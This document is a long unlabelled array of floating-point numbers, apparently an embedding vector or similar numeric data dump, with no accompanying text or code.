[ -0.006417406257241964, 0.02551271952688694, -0.02232755348086357, 0.012960336171090603, -0.009453513659536839, 0.020130885764956474, -0.01555711030960083, 0.050460584461688995, 0.0100026810541749, 0.04810700938105583, 0.01351734809577465, 0.010434169322252274, 0.0032185097225010395, 0.024932172149419785, -0.01355657447129488, 0.015627717599272728, -0.0012571996776387095, 0.021276291459798813, -0.009226001799106598, 0.007790323346853256, 0.01857752725481987, -0.024304553866386414, 0.01462352741509676, 0.03040814958512783, 0.0006143803475424647, 0.018907027319073677, -0.01769886165857315, 0.016208264976739883, -0.019691552966833115, -0.001581796444952488, 0.018012670800089836, 0.024822339415550232, -0.007994299754500389, 0.03859857842326164, 0.002375146374106407, 0.01752626523375511, 0.03866134211421013, 0.04496891424059868, 0.014937336556613445, 0.01975431479513645, -0.028478220105171204, -0.03161631524562836, 0.01537667028605938, -0.004142286721616983, -0.03583705425262451, 0.03191443532705307, -0.010575382970273495, 0.0039245812222361565, -0.022076504305005074, -0.03919481858611107, -0.0021456731483340263, -0.03546048328280449, -0.042019106447696686, -0.00996345467865467, -0.013352598063647747, -0.030627816915512085, 0.03238515183329582, 0.009233847260475159, 0.005628959741443396, 0.03997934237122536, -0.005938846617937088, 0.007719716057181358, -0.022547218948602676, 0.030643507838249207, 0.029451031237840652, -0.021386124193668365, -0.006382102612406015, 0.029717769473791122, -0.03837891295552254, 0.025622554123401642, 0.0023280750028789043, -0.01912669464945793, 0.04763629660010338, 0.012591609731316566, -0.00522100692614913, -0.030816102400422096, 0.045125819742679596, 0.03244791179895401, 0.004456096328794956, -0.005840781144797802, -0.050460584461688995, 0.016835885122418404, -0.07474944740533829, 0.03718643635511398, 0.0070999423041939735, 0.004099137615412474, -0.021903909742832184, -0.06141253933310509, -0.02232755348086357, -0.011383443139493465, -0.004236429464071989, 0.015933683142066002, 0.04456096142530441, -0.019942600280046463, 0.04402748495340347, 0.031224055215716362, -0.015941526740789413, 0.011579574085772038, -0.06433096528053284, -0.031867366284132004, -0.0011944377329200506, -0.03793957829475403, 0.022688433527946472, -0.02132336236536503, 0.04587896168231964, -0.011626645922660828, 0.000826201809104532, -0.0071744718588888645, -0.0007835433352738619, 0.09081649780273438, -0.001581796444952488, -0.0009468224016018212, -0.013305527158081532, 0.008723907172679901, 0.012144431471824646, 0.047793202102184296, -0.04349400848150253, -0.029309816658496857, 0.012928955256938934, -0.019628791138529778, -0.02596774324774742, -0.012183657847344875, -0.020429003983736038, -0.005119019187986851, -0.0130309434607625, 0.0579606331884861, -0.007668721955269575, 0.015243301168084145, 0.03677848353981972, 0.0016435777070000768, -0.04274086654186249, 0.0022731581702828407, 0.01480396743863821, 0.007896234281361103, -0.024947863072156906, 0.021213527768850327, -0.044058866798877716, 0.01172863319516182, -0.014545074664056301, 0.012646527029573917, -0.02737988717854023, -0.024131957441568375, 0.04292915388941765, 0.055418774485588074, -0.004118750803172588, 0.02212357707321644, 0.014121431857347488, 0.02480664849281311, -0.028760649263858795, -0.008778823539614677, 0.007205852773040533, -0.05331625044345856, 0.006342876236885786, -0.016051361337304115, 0.049393631517887115, 0.036307770758867264, 0.012371943332254887, -0.007656954228878021, -0.036150865256786346, -0.007794245611876249, 0.004522780887782574, -0.022202029824256897, -0.017039861530065536, 0.018248027190566063, -0.010088978335261345, -0.03583705425262451, -0.015855230391025543, 0.0033008847385644913, -0.030015887692570686, 0.01489026565104723, -0.014905955642461777, 0.01356441993266344, 0.018420623615384102, -0.010944109410047531, -0.03241652995347977, -0.012677907943725586, 0.04305467754602432, 0.020915409550070763, -0.03407972306013107, -0.009218157269060612, -0.03229100629687309, -0.006691989488899708, -0.03247929364442825, -0.009116169065237045, 0.023394504562020302, -0.010669526644051075, 0.05341039225459099, -0.01645931415259838, 0.026689505204558372, 0.005248465575277805, 0.02330036275088787, 0.01252884790301323, 0.03433077037334442, -0.010410632938146591, 0.021825456991791725, -0.019942600280046463, -0.016059206798672676, -0.04967606067657471, -0.03282448276877403, 0.009877157397568226, 0.018514765426516533, -0.02410057745873928, 0.004460019059479237, -0.020209338515996933, -0.018436314538121223, 0.0006982263294048607, -0.004334494937211275, 0.04409024864435196, 0.010190966539084911, -0.020852647721767426, -0.030455220490694046, -0.03690400719642639, 0.03546048328280449, 0.029576554894447327, 0.010136050172150135, 0.014286181889474392, -0.0011542309075593948, -0.0013748783385381103, -0.0008173759561032057, -0.037374723702669144, 0.02345726639032364, -0.003732372773811221, 0.017887147143483162, -0.0030400303658097982, -0.01645931415259838, 0.008692526258528233, 0.0033852211199700832, 0.007115632761269808, 0.0047306795604527, -0.01231702696532011, 0.0395086295902729, 0.010347871109843254, -0.016114123165607452, -0.009045561775565147, 0.02827424369752407, -0.004004994872957468, 0.01257591973990202, -0.023268980905413628, -0.02436731569468975, -0.0069783409126102924, -0.0316476970911026, 0.015415896661579609, -0.016427932307124138, 0.006640995386987925, 0.014215574599802494, 0.04951915517449379, 0.018546147271990776, 0.03866134211421013, -0.00942213274538517, 0.03199288994073868, 0.03202426806092262, -0.014160658232867718, 0.0011532502248883247, 0.007625573314726353, 0.007758942432701588, 0.023347433656454086, 0.03643329441547394, 0.011320681311190128, -0.010575382970273495, -0.03414248302578926, -0.014905955642461777, -0.0017073203343898058, -0.017902838066220284, -0.04810700938105583, -0.004989572800695896, -0.020931100472807884, 0.0006178126204758883, -0.02267274260520935, -0.011414824053645134, -0.018828576430678368, 0.014246955513954163, -0.025089077651500702, -0.030643507838249207, 0.03637053072452545, -0.01609843224287033, -0.011720788665115833, 0.0037382568698376417, 0.012458240613341331, 0.03367177024483681, -0.0015572800766676664, 0.012301336042582989, 0.023174839094281197, 0.026375696063041687, 0.01928360015153885, -0.014529384672641754, 0.004534548614174128, 0.009484894573688507, 0.038881007581949234, -0.03963415324687958, -0.00021366021246649325, 0.002247661119326949, 0.02212357707321644, -0.041548389941453934, 0.013227074407041073, 0.013768396340310574, -0.012834812514483929, -0.031255435198545456, 0.028933243826031685, 0.029105840250849724, -0.004946423694491386, 0.003416602034121752, -0.0034205245319753885, 0.0010738172568380833, 0.0026183489244431257, -0.01310939621180296, 0.03211841359734535, -0.022986553609371185, 0.03608810529112816, -0.03279310092329979, -0.046004485338926315, 0.01787145622074604, 0.0004643401480279863, -0.032855864614248276, -0.02284533903002739, -0.02089971862733364, 0.012787740677595139, 0.001982884481549263, -0.013948836363852024, -0.0433998666703701, 0.006590001285076141, -0.01023019291460514, 0.0066762990318238735, -0.03530357778072357, 0.017228147014975548, 0.017808694392442703, -0.015502193942666054, -0.02683071978390217, 0.0016014096327126026, -0.030565055087208748, 0.021715624257922173, 0.00768833514302969, 0.01307016983628273, 0.056234680116176605, 0.005170013289898634, 0.05341039225459099, -0.036935389041900635, -0.015172693878412247, -0.008253192529082298, -0.007723638787865639, -0.007857007905840874, 0.016553455963730812, 0.008363025262951851, 0.012560228817164898, -0.04719696193933487, -0.02499493397772312, -0.033044151961803436, -0.013172158040106297, 0.011587419547140598, 0.01378408633172512, 0.0023849529679864645, 0.001000268035568297, 0.004554161801934242, -0.0005271020345389843, -0.0022653129417449236, 0.021480266004800797, 0.0013895881129428744, -0.011187312193214893, -0.01120300218462944, 0.015298217535018921, 0.019440503790974617, 0.005205316469073296, -0.057207487523555756, 0.0063703348860144615, 0.051684439182281494, -0.010410632938146591, 0.03269895911216736, -0.03546048328280449, 0.034895628690719604, -0.027270054444670677, -0.018640289083123207, 0.017902838066220284, 0.01337613444775343, -0.05403801053762436, 0.040418677031993866, -0.050994060933589935, -0.005997685715556145, -0.000141949814860709, -0.007398060988634825, -0.030423840507864952, 0.010598919354379177, -0.05165306106209755, 0.05538739264011383, 0.03211841359734535, -0.02747403085231781, -0.01617688499391079, 0.005099406000226736, 0.016019979491829872, -0.007064638659358025, -0.03938310593366623, -0.022343242540955544, -0.028305625542998314, 0.022798266261816025, -0.015510039404034615, -0.015494348481297493, -0.023959362879395485, 0.04744800925254822, -0.04744800925254822, -0.014082205481827259, 0.01253669336438179, -0.008512085303664207, 0.07650677859783173, -0.01716538518667221, 0.016380861401557922, -0.00458161998540163, -0.03084748238325119, 0.045565154403448105, -0.009500585496425629, 0.016992788761854172, 0.02632862515747547, 0.011548193171620369, 0.02204512432217598, -0.010826431214809418, -0.00951627641916275, -0.023535719141364098, 0.006009453907608986, 0.014419551007449627, 0.007641263771802187, 0.03514667600393295, -0.007327454164624214, 0.034456294029951096, 0.026626743376255035, 0.005903542973101139, -0.006597846746444702, -0.021715624257922173, 0.022343242540955544, 0.020115194842219353, 0.009406442753970623, 0.0026987625751644373, 0.033577628433704376, -0.014670598320662975, 0.012701443396508694, -0.06150668114423752, 0.029215672984719276, -0.029309816658496857, 0.009673180989921093, 0.0240064337849617, -0.01991121843457222, -0.009218157269060612, -0.018091123551130295, -0.0017681209137663245, -0.0353977233171463, 0.023896601051092148, 0.014294027350842953, 0.009069097228348255, 0.018467694520950317, -0.03753162920475006, -0.00704894820228219, -0.053222108632326126, 0.007947227917611599, 0.022641362622380257, -0.006154590751975775, 0.00875528808683157, 0.022107886150479317, -0.028870481997728348, -0.018828576430678368, 0.005209239199757576, -0.011791395954787731, -0.0002463895652908832, 0.04967606067657471, -0.00813551340252161, -0.02899600751698017, 0.01832647994160652, 0.016992788761854172, -0.004573774989694357, 0.017086932435631752, 0.005931001156568527, -0.03753162920475006, -0.005295536946505308, 0.016694670543074608, 0.006750829052180052, -0.002394759561866522, -0.01741643249988556, 0.020209338515996933, 0.010214501991868019, -0.015800314024090767, -0.0008237501606345177, -0.005193548742681742, -0.027160219848155975, 0.01857752725481987, -0.01276420522481203, 0.0395086295902729, -0.02311207726597786, 0.007135245483368635, 0.014239110052585602, -0.019958291202783585, -0.003424447262659669, -0.0206172913312912, 0.01743212342262268, -0.015023634769022465, 0.02924705483019352, 0.007923692464828491, 0.0173379797488451, -0.001064010662958026, -0.01466275379061699, -0.02383383922278881, 0.02399074286222458, 0.015141312964260578, -0.010920573957264423, 0.03944586589932442, 0.03145941346883774, -0.01253669336438179, 0.0094613591209054, -0.03241652995347977, -0.0059466916136443615, 0.02871357835829258, -0.006452709902077913, -0.03141234070062637, 0.031082840636372566, -0.026689505204558372, 0.017008479684591293, -0.01769886165857315, -0.015141312964260578, -0.002373185008764267, -0.038629960268735886, -0.004169744905084372, -0.03546048328280449, 0.014435240998864174, -0.006284037139266729, 0.017118314281105995, -0.02532443404197693, -0.03185167536139488, -0.01724383793771267, -0.003032185137271881, 0.027270054444670677, -0.027693696320056915, 0.009131859056651592, 0.012152276933193207, -0.020240718498826027, 0.012246419675648212, 0.010363562032580376, -0.034268006682395935, -0.014749051071703434, 0.011799240484833717, 0.002596774371340871, -0.0014729438116773963, -0.0143097173422575, -0.002828208962455392, -0.0005025856662541628, 0.002375146374106407, -0.028697887435555458, -0.027521101757884026, 0.022202029824256897, -0.029451031237840652, 0.013274146243929863, -0.005805477499961853, 0.008872966282069683, 0.0012385672889649868, 0.010834276676177979, 0.02124490961432457, 0.01580815762281418, 0.02728574350476265, -0.0183107890188694, 0.007131323218345642, 0.01404297910630703, 0.012113050557672977, 0.013729169964790344, 0.001092449645511806, 0.03473872318863869, 0.02072712406516075, -0.0032459679059684277, -0.02259429171681404, 0.021119385957717896, 0.02720729261636734, 0.01280343160033226, 0.003116521518677473, 0.009681026451289654, -0.009320144541561604, 0.004440405871719122, -0.03753162920475006, -0.007147013675421476, -0.005821167957037687, -0.007323531433939934, 0.010034061968326569, -0.013203538954257965, -0.0068449717946350574, 0.02648553065955639, 0.023582791909575462, -0.031129911541938782, -0.007700102869421244, -0.011273609474301338, 0.0061742039397358894, -0.007551043294370174, -0.005915310699492693, -0.004456096328794956, 0.023520030081272125, -0.02711314894258976, -0.00526415603235364, 0.004550239071249962, -0.04933086782693863, -0.021715624257922173, 0.000559953972697258, 0.03837891295552254, 0.0016994751058518887, -0.0028595898766070604, 0.019973980262875557, -0.042176008224487305, 0.011446204967796803, 0.013580109924077988, 0.0453454852104187, -0.024037815630435944, -0.01359580084681511, 0.04452958330512047, -0.005185703746974468, -0.0031557476613670588, -0.019330671057105064, -0.0019426775397732854, 0.0010885270312428474, 0.015298217535018921, -0.009477050043642521, 0.012285646051168442, -0.009257382713258266, -0.00008317179890582338, 0.04383920133113861, 0.01848338544368744, 0.016427932307124138, 0.015204074792563915, 0.010873502120375633, -0.008378716185688972, 0.024696815758943558, -0.002661497564986348, 0.027411269024014473, -0.03891238942742348, 0.04082662984728813, -0.01301525253802538, 0.039069294929504395, 0.03442491218447685, -0.0005888832965865731, -0.050084009766578674, 0.01301525253802538, -0.02168424241244793, -0.033922817558050156, 0.02480664849281311, -0.00892788264900446, -0.021386124193668365, -0.04738524928689003, -0.017902838066220284, 0.015431586652994156, -0.02603050507605076, 0.002892932156100869, -0.021558718755841255, 0.012371943332254887, -0.0016220033867284656, -0.034362152218818665, 0.04704006016254425, -0.002381030237302184, 0.018781503662467003, -0.004279578570276499, -0.017761623486876488, 0.009681026451289654, 0.007182317320257425, -0.018248027190566063, -0.002794866682961583, -0.01435678917914629, 0.01387038454413414, 0.02276688627898693, -0.01555711030960083, 0.023629862815141678, 0.025026315823197365, 0.003802980063483119, -0.02187252789735794, -0.008041370660066605, 0.005213161930441856, 0.015211920253932476, -0.017228147014975548, -0.009531966410577297, 0.017620408907532692, -0.01360364630818367, 0.009445669129490852, -0.006574310828000307, -0.02543426863849163, 0.023880910128355026, -0.00964964460581541, 0.032573435455560684, -0.03004726953804493, 0.024838030338287354, -0.016820194199681282, -0.021040933206677437, 0.004785596393048763, 0.011430514976382256, -0.023488648235797882, 0.006382102612406015, -0.017134003341197968, -0.0019760197028517723, 0.0005315149901434779, -0.021637171506881714, 0.004636536817997694, 0.03520943596959114, -0.02665812522172928, -0.020774194970726967, 0.022343242540955544, 0.04054420068860054, -0.010073288343846798, 0.007727561518549919, 0.04446681961417198, 0.0032518520019948483, -0.02818010188639164, 0.006229120306670666, 0.01653776504099369, 0.00012969161616638303, -0.037814054638147354, -0.0027830989565700293, 0.005424983333796263, -0.015878764912486076, -0.002926274435594678, -0.02105662412941456, -0.021762695163488388, 0.001631809864193201, 0.0007448074757121503, -0.018969789147377014, 0.029498102143406868, 0.005173935554921627, 0.018608909100294113, 0.018828576430678368, -0.002330036135390401, 0.0040324535220861435, -0.0034087568055838346, -0.011101014912128448, -0.03787681832909584, -0.004059911705553532, 0.011587419547140598, 0.007190162315964699, -0.009014180861413479, -0.011414824053645134, -0.006974418181926012, 0.011571728624403477, 0.02924705483019352, 0.017212456092238426, 0.019063932821154594, 0.011956145986914635, 0.013611490838229656, -0.02436731569468975, -0.0011512889759615064, 0.006970495451241732, 0.01777731440961361, -0.0115168122574687, 0.015933683142066002, -0.003926542587578297, -0.002073104726150632, 0.04060696065425873, 0.015572801232337952, 0.00018240182544104755, 0.010779359377920628, -0.018185265362262726, 0.016914337873458862, -0.010081132873892784, -0.003995188511908054, 0.018106814473867416, 0.010410632938146591, -0.01018312107771635, 0.007339221891015768, 0.038724105805158615, 0.018028361722826958, 0.006056525278836489, -0.04713420197367668, -0.006425251252949238, -0.008865120820701122, 0.017196765169501305, -0.0163651704788208, 0.01617688499391079, -0.01901686191558838, 0.006946959998458624, 0.001379781519062817, -0.019864147529006004, 0.007005799096077681, -0.0032734263222664595, 0.010920573957264423, 0.0037872896064072847, -0.009853621013462543, 0.017196765169501305, -0.022955171763896942, 0.010481240227818489, 0.0016259260009974241, -0.026344316080212593, -0.026783648878335953, -0.017714552581310272, -0.013446740806102753, -0.023755386471748352, -0.0051033287309110165, 0.00371079845353961, -0.003153786528855562, -0.037374723702669144, -0.010340026579797268, -0.05736439302563667, 0.009971300140023232, 0.003991265781223774, -0.03502115234732628, 0.01821664720773697, 0.0059113884344697, -0.004683608189225197, 0.0027144530322402716, 0.018263718113303185, 0.008731751702725887, 0.018106814473867416, -0.026422768831253052, 0.0115168122574687, 0.007554966025054455, 0.0025320511776953936, -0.006225198041647673, -0.024571292102336884, -0.01823233813047409, 0.0013150583254173398, 0.015415896661579609, 0.0024889023043215275, -0.03185167536139488, 0.008872966282069683, -0.008676835335791111, -0.01813819445669651, -0.005185703746974468, -0.009124013595283031, 0.026469839736819267, -0.012332716956734657, -0.008621918968856335, 0.021276291459798813, -0.027332816272974014, 0.008386561647057533, -0.019958291202783585, -0.010081132873892784, -0.006201662123203278, -0.00263207801617682, 0.04757353290915489, -0.035429105162620544, -0.004440405871719122, -0.016396550461649895, -0.014968717470765114, 0.013886074535548687, -0.04107767716050148, -0.014709824696183205, 0.021276291459798813, 0.034707341343164444, -0.01716538518667221, -0.0011659987503662705, 0.016427932307124138, -0.012175812385976315, 0.017290908843278885, -0.04518858343362808, 0.027521101757884026, 0.011563883163034916, -0.007986454293131828, -0.014701979234814644, 0.04104629531502724, -0.011877693235874176, -0.007323531433939934, -0.04167391359806061, -0.020774194970726967, 0.042615342885255814, -0.019597409293055534, -0.004585542716085911, -0.011760015040636063, 0.008143358863890171, 0.03655881807208061, 0.020476076751947403, 0.005621114280074835, 0.03235376998782158, 0.03793957829475403, -0.026454148814082146, 0.0028203637339174747, -0.0206172913312912, -0.00817473977804184, 0.019534647464752197, -0.006997954100370407, 0.01848338544368744, -0.022641362622380257, -0.03831615298986435, -0.03167907893657684, -0.003416602034121752, -0.027505410835146904, 0.014545074664056301, -0.02356710098683834, -0.038347531110048294, -0.010167431086301804, -0.01832647994160652, -0.027426958084106445, -0.016867265105247498, -0.009877157397568226, -0.03903791308403015, 0.0035009384155273438, -0.004785596393048763, -0.014866729266941547, 0.009029870852828026, -0.011359907686710358, 0.02107231505215168, 0.03348348289728165, 0.0023378815967589617, -0.003451905446127057, 0.021025242283940315, -0.031506482511758804, -0.00014954988728277385, -0.015023634769022465, -0.02505769580602646, 0.004593388177454472, 0.009939919225871563, 0.000259138090768829, -0.015462967567145824, 0.018200956284999847, 0.020036742091178894, 0.033828675746917725, 0.0038127866573631763, -0.04054420068860054, -0.014552920125424862, -0.03141234070062637, -0.006268346682190895, -0.00301257218234241, 0.011171621270477772, 0.014701979234814644, 0.0063114953227341175, 0.030737649649381638, 0.03244791179895401, 0.006209507584571838, -0.017745932564139366, 0.0013984140241518617, 0.00522100692614913, -0.004307036753743887, 0.0036499977577477694, -0.007339221891015768, -0.01601213403046131, 0.0013003485510125756, -0.005919233430176973, 0.007629495579749346, 0.0023712236434221268, 0.03922620043158531, -0.007833472453057766, 0.004189358092844486, 0.007143090944737196, 0.03759438917040825, 0.006719448138028383, -0.02932550758123398, -0.023425886407494545, 0.004385489039123058, -0.004377644043415785, -0.00473460229113698, 0.01796559989452362, -0.00016082741785794497, 0.007303918246179819, -0.0028478221502155066, 0.02063298039138317, -0.02905876934528351, -0.017385052517056465, 0.0012385672889649868, 0.009877157397568226, -0.046726249158382416, 0.042081866413354874, 0.008261037990450859, -0.021495956927537918, -0.02756817266345024, -0.011932609602808952, 0.025983434170484543, -0.008323799818754196, -0.0013317294651642442, -0.03655881807208061, -0.007888388819992542, 0.010332181118428707, 0.0031282894778996706, -0.04361953213810921, -0.0024398695677518845, 0.007594192400574684, -0.001135598518885672, -0.017714552581310272, 0.00018620186892803758, 0.03229100629687309, 0.018248027190566063, 0.01177570503205061, 0.015878764912486076, -0.022170647978782654, -0.009147549979388714, -0.011626645922660828, -0.005813322961330414, -0.031522173434495926, 0.04104629531502724, -0.030110031366348267, -0.013697789050638676, 0.037563007324934006, -0.016992788761854172, -0.01945619471371174, 0.025732386857271194, -0.0033636465668678284, 0.0158238485455513, 0.02105662412941456, -0.019707242026925087, -0.014403860084712505, -0.00786877516657114, -0.00000223711913349689, -0.041203200817108154, 0.028148720040917397, 0.009445669129490852, 0.03298138827085495, -0.0206172913312912, -0.012034597806632519, 0.01688295602798462, -0.008308108896017075, 0.0077471742406487465, -0.013525193557143211, 0.015933683142066002, 0.003467596136033535, -0.037468865513801575, 0.05137063190340996, -0.008621918968856335, 0.028493911027908325, 0.008692526258528233, -0.017761623486876488, -0.02452421933412552, -0.0565171092748642, -0.0052366978488862514, -0.019048241898417473, -0.002841938054189086, 0.012717134319245815, 0.016427932307124138, 0.010826431214809418, -0.01538451574742794, -0.044592343270778656, 0.027521101757884026, -0.0034283697605133057, 0.0011699213646352291, -0.012811277061700821, 0.007111710030585527, -0.019503265619277954, 0.007194085046648979, -0.004534548614174128, 0.020852647721767426, 0.028305625542998314, 0.010300800204277039, 0.0074255196377635, 0.005170013289898634, 0.002814479870721698, -0.03147510066628456, 0.0007624592399224639, 0.024414386600255966, -0.006974418181926012, 0.016569146886467934, 0.028117340058088303, 0.030204173177480698, -0.010622454807162285, 0.012364097870886326, 0.01001052651554346, 0.0206172913312912, 0.00263207801617682, -0.010732288472354412, -0.008692526258528233, -0.026799339801073074, -0.010371407493948936, -0.0015258991625159979, 0.042458437383174896, -0.013274146243929863, -0.04167391359806061, -0.026093268766999245, 0.0030635662842541933, -0.004966036882251501, -0.002410450018942356, 0.008080597035586834, 0.009084788151085377, 0.02490079216659069, -0.01226995512843132, -0.005428906064480543, 0.07098373025655746, -0.016239646822214127, 0.0096967164427042, -0.014639217406511307, -0.02372400462627411, 0.010088978335261345, 0.01609843224287033, -0.005978072993457317, 0.008794513531029224, -0.014498003758490086, 0.0037343341391533613, -0.014019443653523922, -0.019691552966833115, -0.02916860207915306, -0.007394138723611832, 0.008323799818754196, 0.00769225787371397, 0.0070411027409136295, 0.012207193300127983, -0.00019564066315069795, -0.015541420318186283, -0.016208264976739883, 0.018153885379433632, -0.02240600436925888, 0.03975967690348625, -0.02002105303108692, -0.011234383098781109, 0.0036303848028182983, 0.005844703875482082, -0.029011696577072144, 0.019864147529006004, 0.017761623486876488, -0.05372420325875282, 0.016333788633346558, -0.0038696646224707365, -0.015988599509000778, 0.003669610945507884, -0.014733360148966312, -0.01412927731871605, 0.007335299160331488, 0.0008144339662976563, -0.01768317073583603, -0.027944743633270264, 0.0031812447123229504, 0.016412241384387016, 0.09000059217214584, 0.04274086654186249, -0.015572801232337952, 0.00950843095779419, 0.005303381942212582, -0.009218157269060612, 0.0015955256531015038, 0.004926810506731272, 0.005071947816759348, -0.02745833992958069, 0.029576554894447327, -0.002410450018942356, 0.005809400230646133, -0.0029792299028486013, 0.00020642788149416447, -0.003908890765160322, 0.0032812715508043766, 0.0018406894523650408, 0.019001170992851257, 0.012332716956734657, -0.00039446845767088234, 0.03602534160017967, 0.02675226889550686, -0.0270346961915493, 0.016239646822214127, -0.011807085946202278, -0.026375696063041687, 0.005891775246709585, 0.015047170221805573, -0.0024614441208541393, -0.005628959741443396, 0.014615681953728199, -0.008159049786627293, 0.0189227182418108, -0.0004780692979693413, -0.005805477499961853, 0.01617688499391079, -0.02737988717854023, 0.014545074664056301, -0.0029949203599244356, -0.00013042711361777037, -0.022343242540955544, 0.01409005094319582, -0.009531966410577297, -0.015886610373854637, -0.028038887307047844, 0.043242961168289185, 0.02185683883726597, 0.011422669515013695, -0.008637608960270882, 0.0031479024328291416, -0.022986553609371185, 0.014019443653523922, 0.043242961168289185, -0.01026157382875681, 0.010583228431642056, 0.0024359470698982477, 0.013972371816635132, 0.00280075054615736, -0.009571192786097527, 0.00462084636092186, 0.003801018698140979, 0.01947188563644886, 0.002541857771575451, 0.012819121591746807, -0.006115364376455545, -0.03423662856221199, 0.008119823411107063, 0.007319608703255653, 0.02078988589346409, 0.0034146406687796116, -0.003846128936856985, 0.0018593218410387635, -0.010865657590329647, 0.03260481730103493, 0.03555462881922722, 0.0018220569472759962, -0.01257591973990202, -0.029639316722750664, -0.012105205096304417, 0.006629227660596371, 0.025999125093221664, -0.014411705546081066, 0.0024339857045561075, -0.012387634254992008, 0.0100026810541749, -0.0020613367669284344, -0.003761792555451393, -0.0151570038869977, -0.04468648508191109, -0.00902202632278204, 0.0027987894136458635, 0.0026379618793725967, 0.009375061839818954, -0.004922888241708279, 0.00025644127163104713, 0.008386561647057533, 0.018624600023031235, 0.010504776611924171, -0.007060715928673744, 0.009524120949208736, 0.022358933463692665, 0.016380861401557922, 0.009406442753970623, -0.006590001285076141, 0.012693597935140133, 0.012128740549087524, 0.01093626394867897, -0.00169457180891186, -0.006739060860127211, -0.005260233301669359, -0.01893840916454792, -0.00898279994726181, -0.02115076594054699, -0.01865598000586033, -0.01573755033314228, 0.007464745547622442, -0.000014089254364080261, 0.018703052774071693, 0.002051530173048377, -0.029796220362186432, -0.012379788793623447, 0.0433998666703701, -0.018200956284999847, 0.0215901006013155, 0.01627102680504322, 0.013180002570152283, -0.002585006644949317, 0.03583705425262451, 0.030031578615307808, 0.03439353033900261, 0.00016855007561389357, 0.0036421525292098522, -0.007743251975625753, 0.022641362622380257, -0.028697887435555458, 0.009626109153032303, -0.0026360005140304565, 0.023896601051092148, 0.008739597164094448, 0.012113050557672977, 0.016223955899477005, 0.022531529888510704, 0.03229100629687309, 0.019613100215792656, 0.006837126798927784, 0.005503435619175434, 0.00650762626901269, 0.01653776504099369, -0.006633150391280651, 0.002541857771575451, 0.010379252023994923, 0.02107231505215168, 0.04842082038521767, 0.004499244969338179, 0.003145941300317645, 0.008731751702725887, -0.05679953843355179, 0.017400741577148438, -0.0016269065672531724, 0.00844932347536087, 0.028650816529989243, 0.03677848353981972, -0.0027222982607781887, 0.0036009650211781263, 0.016741741448640823, -0.022719815373420715, -0.05485391616821289, -0.01439601555466652, -0.009579038247466087, 0.008778823539614677, -0.003298923373222351, -0.016427932307124138, -0.018373552709817886, 0.013650717213749886, 0.023802457377314568, -0.010104669257998466, -0.011438359506428242, -0.002602658234536648, 0.012481776997447014, -0.008818049915134907, 0.001086565782316029, -0.016820194199681282, 0.00499741779640317, 0.027081768959760666, -0.028023196384310722, 0.038002341985702515, 0.009704561904072762, -0.04161115363240242, 0.005805477499961853, 0.0024045659229159355, 0.010340026579797268, -0.01026157382875681, -0.012324871495366096, -0.027678007259964943, -0.009767323732376099, 0.018812885507941246, -0.001463137217797339, 0.014615681953728199, -0.0006305611459538341, -0.017400741577148438, 0.021621480584144592, 0.0038539741653949022, 0.006672376301139593, 0.0163651704788208, -0.011673716828227043, 0.015588491223752499, 0.02604619599878788, -0.03571153059601784, -0.008465013466775417, -0.018012670800089836, -0.011603109538555145, 0.012018907815217972, -0.0044364831410348415, 0.023174839094281197, -0.009908538311719894, 0.022421695291996002, -0.017463503405451775, -0.017494885250926018, 0.023661242797970772, -0.013627181760966778, 0.003100831061601639, -0.00019380194135010242, 0.0009978164453059435, -0.015164848417043686, -0.004852280952036381, 0.04007348418235779, -0.011399133130908012, -0.01457645557820797, 0.0012415092205628753, 0.023896601051092148, 0.0007688335026614368, 0.009375061839818954, -0.008998489938676357, 0.0024771345779299736, 0.00795507337898016, 0.009304454550147057, -0.012505312450230122, 0.028760649263858795, -0.02320621907711029, 0.010771513916552067, -0.013078015297651291, -0.008339489810168743, 0.0036441138945519924, -0.02143319509923458, -0.00030277721816673875, -0.002808595774695277, 0.03207134082913399, -0.0018367668380960822, 0.0169770997017622, -0.02745833992958069, -0.004597310442477465, -0.0010591073660179973, -0.012434705160558224, -0.011893383227288723, 0.035334959626197815, 0.02099386230111122, -0.005319072864949703, 0.022908100858330727, -0.016584837809205055, 0.005860394332557917, -0.0070999423041939735, -0.008778823539614677, -0.012199347838759422, -0.007837394252419472, 0.007586346939206123, -0.014294027350842953, 0.008967109024524689, -0.008841585367918015, -0.015690479427576065, -0.033828675746917725, 0.001875992980785668, 0.001183650572784245, -0.007641263771802187, -0.008967109024524689, -0.01222288329154253, 0.012811277061700821, -0.04763629660010338, -0.02614033967256546, 0.009641800075769424, -0.0006354644428938627, 0.028588054701685905, 0.003732372773811221, -0.021229218691587448, 0.004695375915616751, 0.023159148171544075, -0.024602672085165977, -0.024226101115345955, -0.0035911586601287127, -0.010379252023994923, 0.00236533978022635, 0.0052406201139092445, -0.01359580084681511, -0.013737015426158905, 0.005385756958276033, -0.00006306837167358026, -0.042458437383174896, 0.03527219966053963, 0.007449055090546608, -0.008590538054704666, 0.014411705546081066, 0.005326917860656977, 0.05011539161205292, 0.026344316080212593, 0.004867971409112215, -0.010238038375973701, -0.017196765169501305, -0.02808595821261406, 0.0063114953227341175, 0.013540884479880333, 0.02683071978390217, -0.016161194071173668, -0.01129714585840702, -0.014937336556613445, -0.0023476879578083754, 0.000616341654676944, 0.009822240099310875, 0.023253291845321655, -0.024477148428559303, -0.002920390572398901, 0.003418563399463892, 0.024649742990732193, 0.005197471473366022, -0.04525134339928627, -0.005052334628999233, 0.0036951079964637756, -0.007774632889777422, 0.01821664720773697, -0.0012189541012048721, -0.010426323860883713, 0.015957217663526535, 0.023159148171544075, 0.01102256216108799, 0.016569146886467934, 0.03084748238325119, -0.010889193043112755, -0.002963539445772767, -0.0016229839529842138, -0.0066017694771289825, -0.022453077137470245, -0.023394504562020302, 0.032510675489902496, -0.03342072293162346, -0.0069783409126102924, 0.021182147786021233, 0.005558352451771498, 0.008621918968856335, -0.0003255774499848485, 0.012434705160558224, -0.026281554251909256, -0.01966017112135887, -0.012442550621926785, -0.027270054444670677, -0.008825894445180893, -0.00871606171131134, 0.04641243815422058, 0.016553455963730812, -0.0007379428716376424, -0.015549265779554844, -0.016851576045155525, -0.03182029351592064, -0.01252884790301323, 0.011540347710251808, -0.02499493397772312, -0.01253669336438179, 0.01538451574742794, -0.017808694392442703, -0.01103040762245655, -0.011093169450759888, 0.004424715414643288, -0.017761623486876488, 0.003932426683604717, -0.006107519380748272, 0.019001170992851257, -0.030863173305988312, -0.008574847131967545, 0.033389341086149216, 0.01796559989452362, -0.0215901006013155, 0.0320085771381855, 0.00786877516657114, 0.023802457377314568, 0.003410717938095331, -0.012167966924607754, -0.005931001156568527, -0.007758942432701588, 